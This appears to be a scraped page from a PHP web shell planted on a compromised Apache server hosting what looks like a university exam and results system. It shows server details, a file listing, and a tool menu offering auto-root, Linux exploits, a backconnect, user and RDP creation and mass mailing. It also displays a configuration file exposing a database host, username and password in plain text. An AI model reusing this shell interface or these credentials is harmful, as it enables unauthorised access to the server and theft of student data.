Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.111.44
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
guk_old /
[ HOME SHELL ]
Name
Size
Permission
Action
ExcelWriterXML
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
docverify
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
gridsrch
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
jqGrid4
[ DIR ]
drwxr-xr-x
jqgridn3.5
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libgd-gd-2.2.3
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
popups
[ DIR ]
drwxr-xr-x
results
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
teacher_photos
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
MainPage.html
11.64
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
SubjectDetailsPopup.js
14.04
KB
-rwxr-xr-x
Thumbs.db
464
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
candidate_list.html
7.42
KB
-rwxr-xr-x
candidate_list.js
33.92
KB
-rwxr-xr-x
cconfig.php
1.06
KB
-rwxr-xr-x
collegeInfoPopup.html
3.75
KB
-rwxr-xr-x
freeze_module_at_admin_college...
9.74
KB
-rwxr-xr-x
homepage.html
3.05
KB
-rwxr-xr-x
index.html
7.34
KB
-rwxr-xr-x
indexlogin.html
5.76
KB
-rwxr-xr-x
load_mannual_js_files.js
23.28
KB
-rwxr-xr-x
mcverifydet.php
14.83
KB
-rwxr-xr-x
mregistry.php
71.66
KB
-rwxr-xr-x
mverifytranscript.php
14.62
KB
-rwxr-xr-x
report_attendance_summary.php
9.4
KB
-rwxr-xr-x
report_ra_invigilator_dairy.ph...
15.77
KB
-rwxr-xr-x
results.php
28.47
KB
-rwxr-xr-x
room_allotment.php
15.46
KB
-rwxr-xr-x
roomwise_register_nos_list.php
16.81
KB
-rwxr-xr-x
student.php
54.12
KB
-rwxr-xr-x
tarka-safari.css
5.95
KB
-rwxr-xr-x
verification.php
2.68
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig.php
<?php define("APP_NAME_G","development"); define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); define("INR_NAME_PICFORMAT", "xx,xx,xx,xxx.xx"); //define("APP_HOST", "http://10.10.200.172/activity/"); //define("APP_HOST", "http://localhost/activity/"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "97.74.228.93"; $this->mstr_user = 'logisys3_logu'; $this->mstr_password = 'Logisys@2106'; $this->mstr_db = 'logisys3_gug'; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); /*$this->mstr_host = "localhost"; $this->mstr_user = 'root'; $this->mstr_password = '1234'; $this->mstr_db = 'logisys3_kus'; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0);*/ } } ?>
Close